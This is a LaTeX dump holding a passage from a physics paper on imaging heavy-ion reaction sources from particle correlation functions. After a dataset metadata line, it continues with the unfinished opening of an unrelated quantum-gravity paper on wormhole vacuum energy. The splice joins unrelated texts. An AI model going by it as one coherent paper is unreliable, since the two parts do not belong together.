of the Earth's interior to reading license plates from
blurred photographs to issue speeding fines. My own interest
in the problem stems from seeing an image of Betelguese, a~red
giant $\sim 600$~ly away that has irregular features changing
with time. The~image was obtained using intensity
interferometry such as used in nuclear physics~\cite{boa90}.
After seeing this, the natural question was whether images could be
obtained for nuclear reactions. Needless to say, answers to such
questions tend to be negative.
In a~typical imaging problem, the~measurements yield
a~function (in our case, the correlation function $C$) which is related
in a~linear fashion to the function of interest (in our case, the
source function $S$):
\begin{equation}
\label{CKS}
C(q) = \int dr \, K(q,r) \, S(r) \, .
\end{equation}
In other words, given the data for $C$ with errors, the task of
imaging is the determination of the source function~$S$.
Generally, this requires an~inversion of the kernel~$K$. The~more
singular the kernel~$K$, the~better the chances for a~successful
restoration of~$S$.
In reactions with many particles in the final state, there is a~linear
relation of the type (\ref{CKS})
between the two-particle cross section $d^6 \sigma / d^3 {
p}_1 \, d^3 {
p}_2$ and the unnormalized relative distribution of emission points~$S'$ for
two particles. Interference and interaction terms between the two
particles of interest may be separated out from the general amplitude for the
reaction and described in terms of the two-particle
wavefunction~$\Phi^{(-)}$ (see Fig.~\ref{source}).
\begin{figure}
\begin{center}
\includegraphics[angle=0.0,
width=0.72\textwidth]{source.eps}
\end{center}
\caption{Separation of the interference and final-state
interactions, in terms of the two-particle wavefunction, from
the amplitude for the reaction.}
\label{source}
\end{figure}
The~rest of the amplitude squared, integrated in the cross
section over unobserved particles, yields the unnormalized Wigner
function~$S'$ for the distribution of emission points written
here in the two-particle frame:
\begin{equation}
{d^6 \sigma \over d^3{ p}_{1} \, d^3{ p}_{2}} =
\int
d^3{ r} \,
S'_{\vec{P}}(\vec{ r}) \,
|\Phi_{\vec{ p}_1 - \vec{ p}_2}^{(-)} (\vec{ r})|^2 \, .
\label{2PS}
\end{equation}
The vector $\vec{ r}$ is the relative separation between
emission
points and the equation refers to the case of particles with equal masses.
The size of the source~$S'$ is of the order of the spatial extent of
reaction. The~possibility of probing structures of this size arises
when the wave-function modulus squared, $|\Phi^{(-)}|^2$, possesses
pronounced structures, either due to interaction or symmetrization,
that vary rapidly with the relative momentum, typically at low
momenta.
The two-particle cross section can be normalized to the
single-particle cross sections to yield the correlation
function~$C$:
\begin{equation}
C(\vec{ p}_1 - \vec{ p}_2) =
{ {d^6 \sigma \over d^3{ p}_{1} \, d^3{ p}_{2}} \over
{d^3 \sigma \over d^3{ p}_{1}} \, {d^3 \sigma \over
d^3{ p}_{2}}} = \int
d^3{ r} \,
S_{\vec{ P}} (\vec{ r}) \,
|\Phi_{\vec{ p}_1 - \vec{ p}_2}^{(-)} (\vec{ r})|^2 \, .
\label{CPS}
\end{equation}
The source~$S$ is normalized to~1 as, for large
relative momenta, $C$ is close to~1 and $|\Phi|^2$ in
(\ref{CPS}) averages to~1:
\begin{equation}
\int d^3{ r}
\, S_{\vec{P}} (\vec{ r}) = 1 \, .
\end{equation}
Depending on how the particles are emitted from a~reaction, the
source may have different features. For a~prompt emission, we expect
the~source to be compact and generally isotropic. In the
case of prolonged emission, we expect the~source to be
elongated along the pair momentum, as the emitting system moves
in the two-particle cm. Finally, in the case of secondary
decays, we expect the~source may have an~extended tail.
In the following, I shall discuss restoring the
sources in heavy-ion reactions and extracting information
from the images \cite{bro97}.
\section{Imaging in the Reactions}
The interesting part of the correlation function is its deviation from~1
so we rewrite~(\ref{CPS})
\begin{eqnarray}
\nonumber
\Rftn{P}{q} =
\Corrftn{P}{q}-1
&=& \int \dn{3}{r} \left(\wfsquare{{q}}{{r}}-1\right)
\Source{P}{r} \\
&=& \int \dn{3}{r} K(\vec{q},\vec{r})
\, \Source{P}{r} \, .
\label{RKS}
\end{eqnarray}
From~(\ref{RKS}), it is apparent that to make
the imaging possible $\wfsquare{q}{r}$ must deviate from~1
either on account of symmetrization or interaction within
the pair. The angle-averaged version of (\ref{RKS}) is
\begin{equation}
{\cal R}_{P}({q}) = 4 \pi
\int dr \, r^2 \,
K_0 ({q},{r}) \,
S^0_P(r)
\label{RKS0}
\end{equation}
where $K_0$ is the angle-averaged kernel.
Let us first take the case of identical bosons with negligible
interaction, such as neutral pions or gammas. The two-particle
wavefunction is then
\begin{equation}
\wftn{q}{r}=\frac{1}{\sqrt{2}}\left( e^{i \vec{q}\cdot\vec{r}}
+e^{-i \vec{q}\cdot\vec{r}}\right) \, .
\end{equation}
The interference term causes $\wfsquare{q}{r}$ to deviate from 1 and
\begin{equation}
K(\vec{q},\vec{r}) = \cos{(2 \vec{q} \cdot \vec{r})}.
\end{equation}
In this case, the source is an inverse Fourier cosine-transform
of ${\cal R}_{P}$.
Also, the angle averaged source can be determined from a~Fourier
transformation (FT) of the angle-averaged~$C$ as the averaged
kernel is
\begin{equation}
K^0 (q,r) =
\frac{\sin{(2 q r)}}{2 q r} \, .
\end{equation}
While neutral pion and gamma correlations functions are difficult to measure,
charged pion correlations functions are not. The charged pion correlations
are often corrected approximately for the pion Coulomb interactions
allowing for the use of FT in the pion source determination.
In Figure~\ref{corpi}, I show one such~corrected correlation function for
negative pions from the Au + Au reaction at 10.8~GeV/nucleon
from the measurements by E877 collaboration at
AGS~\cite{bar97}.
\begin{figure}
\begin{center}
\includegraphics[angle=-90.0,
width=0.68\textwidth]{corpi1.eps}
\end{center}
\caption{Gamow-corrected
$\pi^-\pi^-$ correlation function for Au + Au reaction at
10.8~GeV/nucleon obtained by the E877
collaboration~\protect\cite{bar97}.}
\label{corpi}
\end{figure}
In Figure~\ref{pisor}, I show the relative distribution of emission
points for negative pions obtained through the FT of the
correlation function in Fig.~\ref{corpi}.
\begin{figure}
\begin{center}
\includegraphics[angle=0.0,
width=0.66\textwidth]{piminus1.eps}
\end{center}
\caption{Relative source function for negative pions from FT
of the correlation function in Fig.~\protect\ref{corpi}.}
\label{pisor}
\end{figure}
The~FT has been cut off at $q_{max} = 200~MeV/c$ giving
a~resolution in the source of $\Delta r \gapproxeq 1/(2 \,
q_{max}) = 2.0$~fm. The~data spacing gives the highest
distances that can be studied with FT of $r_{max} \lapproxeq 1/(2
\, \Delta q) = 20$~fm. As you see, the~relative source has
a~roughly Gaussian shape.
\section{Perils of Inversion}
For many particle pairs, such as proton pairs, interactions
cannot be ignored and the straightforward FT cannot be used.
Indeed, even in the charged-pion case, one might want to avoid the
approximate Coulomb correction. In lieu of this, we can simply
discretize the source and find the source that minimizes the $\chi^2$.
This procedure could work for any particle pair.
With measurements of $C$ at relative momenta $\lbrace q_i
\rbrace$ and assuming the source is constant over intervals
$\lbrace \Delta r_j \rbrace$, we can write Eq.~(\ref{RKS0}) as
\begin{eqnarray}
{\cal R}_i =
\Clm{0}{0}{q_i}-1 & = & \sum_j 4\pi \, \Delta r
\,
r_j^2 \, K_0 (q_i, r_j) \, S(r_j)\\ &
\equiv & \sum_j K_{ij} \, S_j \, .
\end{eqnarray}
The values ${S_j}$ can be varied to minimize the $\chi^2$:
\begin{equation}
\chi^2 = \sum_j \frac{({\cal R}^{th}(q_j)-
{\cal R}^{exp}(q_j))^2}{\sigma_j^2 } \, .
\end{equation}
Derivatives of the $\chi^2$ with respect to~$S$ give linear algebraic
eqs. for~$S$:
\begin{equation}
\sum_{ij} {1 \over \sigma_i^2} (K_{ij} \, S_j - {\cal
R}_i^{exp}) \, K_{ij} = 0 \, ,
\end{equation}
with the solution in a schematic matrix form:
\begin{equation}
S = (K^\top K)^{-1} \, K^\top \, {\cal R}^{exp} \, .
\label{SKR}
\end{equation}
There is an issue in the above: how do we discretize the source?
The~FT used before suggests fixed-size bins, e.g.~$\Delta r = 2$~fm.
However fixed size bins may not be ideal for all situations as I
will illustrate using Fig.~\ref{gong}. This figure shows the $pp$
correlation function from the measurements~\cite{gon91} of the
$^{14}$N + $^{27}$Al reaction at~75~MeV/nucleon, in different
intervals of total pair momentum.
\begin{figure}
\begin{center}
\includegraphics[angle=90.,width=3.0in]{fig3g.eps}
\end{center}
\caption{
Two-proton correlation function for the $^{14}$N + $^{27}$Al
reaction at~75~MeV/nucleon from the measurements of
Ref.~\protect\cite{gon91} for
three gates of total momentum imposed on protons emitted in the
vicinity of $\theta_{\rm lab} = 25^\circ$. }
\label{gong}
\end{figure}
The different regions in relative momentum are associated with
different physics of the correlation function. For example, the peak
around $q \sim 20$~MeV/c is associated with the $^{1}S_0$
resonance of the wavefunction with a characteristic scale of fm --
this gives access to a~short range structure of the source.
On the other hand, the decline in
the correlation function at low momenta is associated with the
Coulomb repulsion that dominates at large proton separation and
gives access to the source up to (20--30)~fm or more,
depending on how low momenta are available for~$C$. Should we
continue at the resolution of~$\Delta r \gapproxeq 2$~fm up to
such distances? No! At some point there would not be enough many
data points to determine the required number of source values!
Somehow, we should let the resolution vary, depending on the scale
at which we look.
A further issue is that the errors on the source may explode in certain
cases. The errors are given by the inverse square of the kernel:
\begin{equation}
\Delta^2 S_j = (K^\top \, K)^{-1}_{jj} \, .
\end{equation}
The square of the kernel may be diagonalized:
\begin{equation}
(K^\top \, K)_{ij} \equiv \sum_k {1 \over \sigma_k^2} K_{ki}
\, K_{kj} = \sum_\alpha \lambda_\alpha \, u_i^\alpha \,
u_j^\alpha \, .
\end{equation}
where $\lbrace u^\alpha \rbrace$ are orthonormal and
$\lambda_\alpha \ge 0$; the number of vectors of equals the
number of $r$ pts. The errors can be expressed as
\begin{equation}
\Delta^2 S_j = \sum_\alpha {1 \over \lambda_\alpha} \,
u_j^\alpha \, u_j^\alpha \, .
\end{equation}
You can see from the last equation that the errors blow up,
and inversion problem becomes unstable,
if one or more $\lambda$'s approach zero. This
must happen when $K$ maps a~region to zero (remember $K =
|\Phi|^2 - 1$), or when $K$ is too smooth and/or too high
resolution is demanded. A~$\lambda$ close to 0 may be also
hit by accident.
The~stability issue is illustrated with Figs.~\ref{simcor}
and~\ref{nocon2}. Figure~\ref{simcor} shows correlation
functions from model sources with small errors added on.
\begin{figure}
\begin{center}
\includegraphics[angle=0.,width=0.72\textwidth]{cormod.eps}
\end{center}
\caption{
The solid line represents the correlation function from a Gaussian
model source while the dashed lines represent the
correlation functions from a source with an extended tail.
The~points represent values of~$C$ with errors that are
typical for the measurements in Ref.~\protect\cite{gon91}
(Fig.~\protect\ref{gong}). }
\label{simcor}
\end{figure}
\begin{figure}
\begin{center}
\includegraphics[angle=0.,
width=0.72\textwidth]{sorc.eps}
\end{center}
\caption{
The solid histogram is the relative $pp$ source function $S$
restored from the simulated correlation function in
Fig.~\protect\ref{simcor} from the Gaussian model source
(open symbols there).
The~dashed line is the original source function that we used to
generate the correlation function. We employed
fixed-size intervals of $\Delta r = 2$~fm and we imposed
no constraints on~$S$.
}
\label{nocon2}
\end{figure}
Figure~\ref{nocon2} shows the source in 7~fixed-size intervals
of $\Delta r = 2$~fm. This source was restored following
Eq.~(\ref{SKR}), from the correlation function indicated in
Fig.~\ref{simcor}. The~errors in this case far exceed
the original source function. Every second value of
the restored source is negative.
Vast literature, extending back nearly 75 years, exists on
stability in inversion. One of the first researchers to recognize
the difficulty, Hadamard, in 1923~\cite{had23}, argued that
the potentially unstable problems should not be tackled. A~major
step forward was made by Tikhonov~\cite{tik63} who has shown
that placing constraints on the solution can have a~dramatic
stabilizing effect. In determining the source from data, we
developed a~method of optimized discretization for the source
which yields stable results even without any constraints~\cite{bro97}.
In our method, we first concentrate on the errors. We
use the $q$-values for which the correlation function is
determined and the errors of $\lbrace \sigma_i \rbrace$,
but we disregard the values~$\lbrace C_i \rbrace$. We
optimize the binning for the source function to minimize
expected errors relative to a~rough guess on the source
$S^{mod}$:
\begin{equation}
\sum_j {\Delta S_j \over S_j^{mod}} = \sum_{j} {1 \over
S_j^{mod}} \left( \sum_\alpha
{1 \over \lambda_\alpha} \,
u_j^\alpha \, u_j^\alpha \right)^{1/2} \, .
\end{equation}
Only afterwards we use $\lbrace C_i \rbrace$ to determine
source values $S_j$ with the optimized binning. This
consistently yields small errors and an introduction of
constraints may additionally reduce those errors.
The~proton source imaged using the optimized binning from the
correlation function in Fig.~\ref{simcor} is shown
in~Fig.~\ref{nocono}.
\begin{figure}
\begin{center}
\includegraphics[angle=0.,
width=0.72\textwidth]{sorm1.eps}
\end{center}
\caption{
Relative pp source function~$S$ restored (solid histogram)
through the optimized discretization from the correlation
function in Fig.~\protect\ref{simcor} (open symbols there),
together with the original source
function (dashed
line).
}
\label{nocono}
\end{figure}
\section{pp Sources}
Upon testing the method, we apply it to the~75~MeV/nucleon
$^{14}$N + $^{27}$Al data by Gong {\em et al.}~\cite{gon91} shown in
Fig.~\ref{gong}. In terms of the radial wavefunctions $g$, the
angle-averaged $pp$ kernel is
\begin{equation}
K_0 (q,r)=\frac{1}{2}\sum_{j s \ell \ell'} (2j+1) (g_{j
s}^{j j'} (r))^2-1 \, .
\end{equation}
We calculate the wavefunctions by solving radial Schr\"odinger
equations with REID93~\cite{sto94} and Coulomb potentials.
The~sources restored in the three total momentum intervals are
shown in Fig.~\ref{pps}, together with sources obtained
directly from a~Boltzmann equation model~\cite{dan95} (BEM)
for heavy-ion reactions.
\begin{figure}
\begin{center}
\includegraphics[width=4.55in]{sorpp.eps}
\end{center}
\caption{
Relative source
for protons emitted from the $^{14}$N + $^{27}$Al
reaction at 75~MeV/nucleon, in the vicinity of $\theta_{\rm
lab} = 25^\circ$, within three intervals of total momentum
of 270--390~MeV/c (left panel), 450--780~MeV/c
(center panel), and 840--1230~MeV/c (right panel). Solid and
dotted lines
indicate, respectively, the source values extracted from
data~\protect\cite{gon91} and obtained within the
Boltzmann-equation calculation.
}
\label{pps}
\end{figure}
The sources become more focussed around $r=0$ as total momentum
increases. Now, the~value of the source as $r \rightarrow 0$ gives
information on the average density at freeze-out, on space-averaged
phase-space density, and on the
entropy per nucleon. The~freeze-out density may be
estimated from
\begin{equation}
\rho_{freeze} \simeq N_{\rm part} \times
\Sourcenovec{}{r\rightarrow 0} \, ,
\end{equation}
where $N_{\rm part}$ is participant multiplicity. Using the
intermediate momentum range, we find
\begin{equation}
\rho_{freeze}
\approx
(17)(.0015{\rm fm}^{-3}) = .16 \rho_0 \, .
\end{equation}
The space--averaged phase-space density may be estimated from
\begin{equation}
f(\vec{p})\approx\frac{(2\pi)^3}{2s+1}\spectra{P}
\Sourcenovec{\vec{P}}{{r}\rightarrow 0} \, .
\end{equation}
Using the intermediate momentum range we
get $\langle f \rangle \approx .23$ for this reaction.
The transport model reproduces the low-$r$ features of the
sources, including the increased focusing as the total momentum
increases. The~average freeze-out density obtained directly
within the model is $\rho_{freeze} \simeq .14 \rho_0$. Despite
the agreement at low~$r$ between the data and the model, we see
important discrepancies at large~$r$. I discuss these next.
An important quantity characterizing images is the portion
of the source below a~certain distance (e.g.\ the maximum
$r$ imaged):
\begin{equation}
\lambda(r_{max})=\int_{r<r_{max}} d^3 r \, S(\vec{r}) \, .
\label{lambda}
\end{equation}
If $r_{max}\Rightarrow \infty$, then $\lambda$ approaches
unity. The value of $\lambda < 1$ signals that some of the
strength of~$S$ lies outside of the imaged region. The imaged
region is limited in practice by the available information on
details of~$C$ at very-low~$q$.
We can expect pronounced effects for secondary
decays or for long source lifetimes. If some particles
stem from decays of long-lived resonances,
they may be emitted far from any other
particles and contribute to $S$ at $r > r_{max}$.
Table~\ref{lpp} gives the integrals of the imaged sources
together with the integrals of the sources from BEM over the
same spatial region.
\begin{table}
\begin{center}
\begin{tabular}{|cr@{$\pm$}lcc|}\hline
\multicolumn{1}{|c}{$P$-Range} &
\multicolumn{3}{c}{$\lambda(r_{max})$} &
\multicolumn{1}{c|}{$r_{max}$} \\ \cline{2-4}
\multicolumn{1}{|c}{[MeV/c]} &
\multicolumn{2}{c}{restored} &
\multicolumn{1}{c}{BEM} &
\multicolumn{1}{c|}{[fm]} \\ \hline
270-390 & 0.69 & 0.15 & 0.98 & 20.0 \\
450-780 & 0.574 & 0.053 & 0.91 & 18.8 \\
840-1230 & 0.87 & 0.14 & 0.88 & 20.8 \\\hline
\end{tabular}
\end{center}
\caption{Integrals of sources from data and BEM in the three
intervals of total momentum.}
\label{lpp}
\end{table}
Significant strength is missing from the imaged sources in the
low and intermediate momentum intervals. BEM agrees with data
in the highest momentum interval but not in the two
lower-momentum intervals. In BEM there is no intermediate mass
fragment (IMF) production. The~IMFs might be produced in
excited states and, by decaying, contribute protons with low
momenta spread out over large spatial distances. Information
on this possibility can be obtained by examining the IMF
correlation functions.
\section{IMF Sources}
Because of the large charges ($Z \ge 3$), the~kernel in the case
of IMFs is dominated by Coulomb repulsion. With many
partial waves contributing, the kernel approaches the classical
limit~\cite{kim91}:
\begin{equation}
K_0 (q,r)=\theta(r-r_c) (1-r_c/r)^{1/2}-1 \, ,
\end{equation}
where
$r_c=2\mu Z_1 Z_2 e^2/q^2$ is the distance of closest
approach. There are no IMF correlation data available for the
same reaction used to measure the pp correlation data, so we use
data within the same beam energy range, i.e. the
$^{84}Kr-^{197}Au$ at 35, 55, and 70 MeV/nucleon data
by Hamilton {\em et al.}~\cite{ham96}.
The extracted relative IMF sources are shown in Fig.~\ref{IMF}.
\begin{figure}
\begin{center}
\includegraphics[totalheight=3.3in]{fig9.eps}
\end{center}
\caption{
Relative source for IMFs emitted from
central
$^{84}$Kr + $^{197}$Au reactions from the data of
Ref.~\protect\cite{ham96} at 35 (dotted line), 55~(dashed line), and
70~MeV/nucleon (solid line). The insert shows the source
multiplied by~$r^2$. In both plots, the full image extends out to $90$~fm.
}
\label{IMF}
\end{figure}
The source integrals for the IMF sources are given in
Table~\ref{IMFt}. Interestingly, we are nearly capable of restoring
the complete IMF sources.
\begin{table}
\begin{center}
\begin{tabular}{|cr@{$\pm$}lr@{$\pm$}l|}\hline
\multicolumn{1}{|c}{Beam Energy} &
\multicolumn{2}{c}{$\lambda(90 \,{\rm fm})$} &
\multicolumn{2}{c|}{$\lambda(20 \, {\rm fm})$} \\
\multicolumn{1}{|c}{[MeV/A]} &
\multicolumn{2}{c}{ } &
\multicolumn{2}{c|}{ } \\ \hline
35 & 0.96 & 0.07 & 0.72 & 0.04 \\
55 & 0.97 & 0.06 & 0.78 & 0.03 \\
70 & 0.99 & 0.05 & 0.79 & 0.03 \\\hline
\end{tabular}
\end{center}
\caption{Comparison of the integrals of the midrapidity IMF
source function,
$\lambda(r_{max})$,
in central $^{84}$Kr
+ $^{197}$Au reactions at three beam energies,
for different truncation points, $r_{max}$.
The restored sources use the data of Ref.~\protect\cite{ham96}.}
\label{IMFt}
\end{table}
For the relative distances that are accessible using the pp
correlations ($\sim 20$~fm) we find only (70--80)\% of the IMF
sources. This is is comparable to what we see for the lowest-momentum
pp source but above the intermediate-momentum proton source.
We should mention that we can not expect complete quantitative
agreement, even if the data were from the
same reaction and pertained to the same particle-velocity
range. This is due partly to the fact that more protons than final
IMFs can stem from secondary decays.
\section{$\pi^-$ vs. $K^+$ Sources}
We end our discussion of imaging by presenting sources obtained
for pions and kaons from central Au + Au reactions at about
11~GeV/nucleon. This time we use the optimized discretization
technique rather than
the combination of approximate Coulomb corrections and the FT.
For both meson pairs the kernel $K_0$ is given by
a~sum over partial waves:
\begin{equation}
K_0 (q,r)=\sum_{\ell} \frac{(g^{\ell}(r))^2}{(2\ell+1)} -1 .
\end{equation}
where $g_{\ell}(r)$s stem from solving the radial Klein-Gordon
equation with strong and Coulomb interactions. In practice the
strong interactions had barely any effect on the kernels and the extracted
sources.
The data come from the reactions at 10.8~and 11.4~GeV/nucleon~\cite{bar97}.
The respective $\pi^-$ and $K^+$ sources are displayed Fig.~\ref{pikso}.
\begin{figure}
\begin{center}
\includegraphics[totalheight=2.70in]{piksou1.eps}
\end{center}
\caption{
Relative sources of~$\pi^-$ (circles) and of $K^+$ (triangles)
extracted
from central Au + Au data at
11.4~GeV/nucleon~\protect\cite{von98}, for $\pi^-$ and $K^+$,
and at 10.8~GeV/nucleon~\protect\cite{bar97}, for $\pi^-$.
Lines show Gaussian fits to the sources.
}
\label{pikso}
\end{figure}
The kaon source is far more compact than the pion source and
there are several effects that contribute to this difference.
First, kaons have lower scattering cross sections than pions,
making it easier for kaons to leave the system early. Second,
fewer kaons than pions descend from long-lived resonances.
Next, due to their higher mass, the average kaon has a lower
speed than the average pion, making
the kaons less sensitive to lifetime effects. Finally, the kaons
are more sensitive to collective motion than pions, enhancing the kaons'
space-momentum correlations.
Differences, qualitatively similar to those seen in Fig.~\ref{pikso},
in the spatial distributions of emission points for kaons and pions
were predicted long ago within RQMD by
Sullivan~{\em et al.}~\cite{sul93}. In the model, they were able to
separate
the different contributions to the source functions.
The~effects of long-lived resonances, mentioned above, are
apparent in the sources extracted from the data.
Thus,
Table~\ref{lampik} gives
\begin{table}
\begin{center}
\begin{tabular}{|cccr@{$\pm$}l|}
\hline
\multicolumn{1}{|c}{} &
\multicolumn{2}{c}{} &
\multicolumn{2}{c|}{} \\[-2.1ex]
\multicolumn{1}{|c}{} &
\multicolumn{1}{c}{$R_0$ [fm]} &
\multicolumn{1}{c}{$\bar{\lambda}$} &
\multicolumn{2}{c|}{$\lambda(35 {\rm fm})$} \\ \hline
$K^+$ (11.4 GeV/A) & 2.76 & 0.702 & 0.86 & 0.56 \\
$\pi^-$ (11.4 GeV/A) & 6.42 & 0.384 & 0.44 & 0.17 \\
$\pi^-$ (10.8 GeV/A) & 6.43 & 0.486 & 0.59 & 0.22 \\ \hline
\end{tabular}
\end{center}
\caption{
Parameters of Gaussian fits to the sources and integrals
over imaged regions for the central Au + Au reactions.
}
\label{lampik}
\end{table}
the source integrals over the imaged regions together with
parameters of the Gaussian fits to the sources,
\begin{equation}
S(r) = \frac{\bar{\lambda}}{(2\sqrt{\pi} R_0)^3} \exp{\left(-\left(
\frac{r}{2 R_0}\right)^2\right)} \, .
\end{equation}
The~errors are quite small for the fitted values. We find
$\bar{\lambda}_{\pi^-} < \bar{\lambda}_{K^+} < 1$
and~$\bar{\lambda} \lapproxeq \lambda$.
\section{Conclusions}
We have demonstrated that a~model-independent imaging of
reactions is possible. Specifically, we have carried out
one-dimensional
imaging of pion, kaon, proton, and IMF sources.
The~three-dimensional imaging of pion sources is in
progress. Our method of optimized discretization allows us to
investigate the sources on a~logarithmic scale up to
large distances. The sources generally contain information
on freeze-out phase-space density, entropy, spatial density,
lifetime and size of the freeze-out region, as well as
on resonance decays. The imaging gives us access to the spatial
structure required to extract that information.
\section*{Acknowledgment}
This work was partially supported by the National Science Foundation
under Grant PHY-9605207.
\section*{References}
| 2024-02-18T23:40:12.560Z | 1998-11-13T05:24:50.000Z | algebraic_stack_train_0000 | 1,657 | 4,242 |
|
proofpile-arXiv_065-8154 | \section{Introduction}
One of the most fascinating problem of our century is the possibility of
combining the principles of Quantum Mechanics with those of General
Relativity. The result of this combination is best known as Quantum Gravity.
However such a theory has to be yet developed, principally due to the UV
divergences that cannot be kept under control by any renormalization scheme.
J.A. Wheeler\cite{Wheeler} was the first who conjectured that fluctuations
of the metric have to appear at short scale distances. The collection of
such fluctuations gives the spacetime a kind of foam-like structure, whose
topology is constantly changing. In this foamy spacetime a fundamental
length comes into play: the Planck length. Its inverse, the Planck mass $m_p$%
, can be thought as a natural cut-off. It is believed that in such
spacetime, general relativity can be renormalized when a density of virtual
black holes is taken under consideration coupled to $N$ fermion fields in a $%
1/N$ expansion\cite{CraneSmolin}. It is also argued that when gravity is
coupled to $N$ conformally invariant scalar fields the evidence that the
ground-state expectation value of the metric is flat space is false\cite
{HartleHorowitz}. However instead of looking at gravity coupled to matter
fields, we will consider pure gravity. In this context two metrics which are
solutions of the equations of motion without a cosmological constant are
known with the property of the spherical symmetry: the Schwarzschild metric
and the Flat metric. We will focus our attention on these two metrics with
the purpose of examining the energy contribution to the vacuum fluctuation
generated by a collection of $N$ coherent wormholes. A straightforward
extension to the deSitter and the Schwarzschild-deSitter spacetime case is
immediate. The paper is structured as follows, in section \ref{p2} we
briefly recall the results reported in Ref.\cite{Remo1}, in section \ref{p3}
we generalize the result of section \ref{p2} to $N_w$ wormholes. We
summarize and conclude in section \ref{p3}.
\section{One wormhole approximation}
\label{p2}The reference model we will consider is an eternal black hole. The
complete manifold ${\cal M}$ can be thought as composed of two wedges ${\cal %
M}_{+}$ and ${\cal M}_{-}$ located in the right and left sectors of a
Kruskal diagram whose spatial slices $\Sigma $ represent Einstein-Rosen
bridges with wormhole topology $S^2\times R^1$. The hypersurface $\Sigma $
is divided in two parts $\Sigma _{+}$ and $\Sigma _{-}$ by a bifurcation
two-surface $S_0$. We begin with the line element
\begin{equation}
ds^2=-N^2\left( r\right) dt^2+\frac{dr^2}{1-\frac{2m}r}+r^2\left( d\theta
^2+\sin ^2\theta d\phi ^2\right) \label{a1}
\end{equation}
and we consider the physical Hamiltonian defined on $\Sigma $%
\[
H_P=H-H_0=\frac 1{l_p^2}\int_\Sigma d^3x\left( N{\cal H}+N_i{\cal H}%
^i\right) +H_{\partial \Sigma ^{+}}+H_{\partial \Sigma ^{-}}
\]
\[
=\frac 1{l_p^2}\int_\Sigma d^3x\left( N{\cal H}+N_i{\cal H}^i\right)
\]
\begin{equation}
+\frac 2{l_p^2}\int_{S_{+}}^{}d^2x\sqrt{\sigma }\left( k-k^0\right) -\frac 2{%
l_p^2}\int_{S_{-}}d^2x\sqrt{\sigma }\left( k-k^0\right) ,
\end{equation}
where $l_p^2=16\pi G$. The volume term contains two contstraints
\begin{equation}
\left\{
\begin{array}{l}
{\cal H}=G_{ijkl}\pi ^{ij}\pi ^{kl}\left( \frac{l_p^2}{\sqrt{g}}\right)
-\left( \frac{\sqrt{g}}{l_p^2}\right) R^{\left( 3\right) }=0 \\
{\cal H}^i=-2\pi _{|j}^{ij}=0
\end{array}
\right. , \label{a1a}
\end{equation}
where $G_{ijkl}=\frac 12\left( g_{ik}g_{jl}+g_{il}g_{jk}-g_{ij}g_{kl}\right)
$ and $R^{\left( 3\right) }$ denotes the scalar curvature of the surface $%
\Sigma $. By using the expression of the trace
\begin{equation}
k=-\frac 1{\sqrt{h}}\left( \sqrt{h}n^\mu \right) _{,\mu },
\end{equation}
with the normal to the boundaries defined continuously along $\Sigma $ as $%
n^\mu =\left( h^{yy}\right) ^{\frac 12}\delta _y^\mu $. The value of $k$
depends on the function $r,_y$, where we have assumed that the function $%
r,_y $ is positive for $S_{+}$ and negative for $S_{-}$. We obtain at either
boundary that
\begin{equation}
k=\frac{-2r,_y}r.
\end{equation}
The trace associated with the subtraction term is taken to be $k^0=-2/r$ for
$B_{+}$ and $k^0=2/r$ for $B_{-}$. Then the quasilocal energy with
subtraction terms included is
\begin{equation}
E_{{\rm quasilocal}}=E_{+}-E_{-}=\left( r\left[ 1-\left| r,_y\right| \right]
\right) _{y=y_{+}}-\left( r\left[ 1-\left| r,_y\right| \right] \right)
_{y=y_{-}}.
\end{equation}
Note that the total quasilocal energy is zero for boundary conditions
symmetric with respect to the bifurcation surface $S_0$ and this is the
necessary condition to obtain instability with respect to the flat space. A
little comment on the total Hamiltonian is useful to further proceed. We are
looking at the sector of asymptotically flat metrics included in the space
of all metrics, where the Wheeler-DeWitt equation
\begin{equation}
{\cal H}\Psi =0
\end{equation}
is defined. In this sector the Schwarzschild metric and the Flat metric
satisfy the constraint equations $\left( \ref{a1a}\right) $. Here we
consider deviations from such metrics in a WKB approximation and we
calculate the expectation value following a variational approach where the
WKB functions are substituted with trial wave functionals. Then the
Hamiltonian referred to the line element $\left( \ref{a1}\right) $ is
\[
H=\int_\Sigma d^3x\left[ G_{ijkl}\pi ^{ij}\pi ^{kl}\left( \frac{l_p^2}{\sqrt{%
g}}\right) -\left( \frac{\sqrt{g}}{l_p^2}\right) R^{\left( 3\right) }\right]
.
\]
Instead of looking at perturbations on the whole manifold ${\cal M}$, we
consider perturbations at $\Sigma $ of the type $g_{ij}=\bar{g}_{ij}+h_{ij}$%
. $\bar{g}_{ij}$ is the spatial part of the background considered in eq.$%
\left( \ref{a1}\right) $In Ref.\cite{Remo1}, we have defined $\Delta E\left(
m\right) $ as the difference of the expectation value of the Hamiltonian
approximated to second order calculated with respect to different
backgrounds which have the asymptotic flatness property. This quantity is
the natural extension to the volume term of the subtraction procedure for
boundary terms and is interpreted as the Casimir energy related to vacuum
fluctuations. Thus
\[
\Delta E\left( m\right) =E\left( m\right) -E\left( 0\right)
\]
\begin{equation}
=\frac{\left\langle \Psi \left| H^{Schw.}-H^{Flat}\right| \Psi \right\rangle
}{\left\langle \Psi |\Psi \right\rangle }+\frac{\left\langle \Psi \left|
H_{quasilocal}\right| \Psi \right\rangle }{\left\langle \Psi |\Psi
\right\rangle }.
\end{equation}
By restricting our attention to the graviton sector of the Hamiltonian
approximated to second order, hereafter referred as $H_{|2}$, we define
\[
E_{|2}=\frac{\left\langle \Psi ^{\perp }\left| H_{|2}^1\right| \Psi ^{\perp
}\right\rangle }{\left\langle \Psi ^{\perp }|\Psi ^{\perp }\right\rangle },
\]
where
\[
\Psi ^{\perp }=\Psi \left[ h_{ij}^{\perp }\right] ={\cal N}\exp \left\{ -%
\frac 1{4l_p^2}\left[ \left\langle \left( g-\bar{g}\right) K^{-1}\left( g-%
\bar{g}\right) \right\rangle _{x,y}^{\perp }\right] \right\} .
\]
After having functionally integrated $H_{|2}$, we get
\begin{equation}
H_{|2}=\frac 1{4l_p^2}\int_\Sigma d^3x\sqrt{g}G^{ijkl}\left[ K^{-1\bot
}\left( x,x\right) _{ijkl}+\left( \triangle _2\right) _j^aK^{\bot }\left(
x,x\right) _{iakl}\right]
\end{equation}
The propagator $K^{\bot }\left( x,x\right) _{iakl}$ comes from a functional
integration and it can be represented as
\begin{equation}
K^{\bot }\left( \overrightarrow{x},\overrightarrow{y}\right) _{iakl}:=\sum_N%
\frac{h_{ia}^{\bot }\left( \overrightarrow{x}\right) h_{kl}^{\bot }\left(
\overrightarrow{y}\right) }{2\lambda _N\left( p\right) },
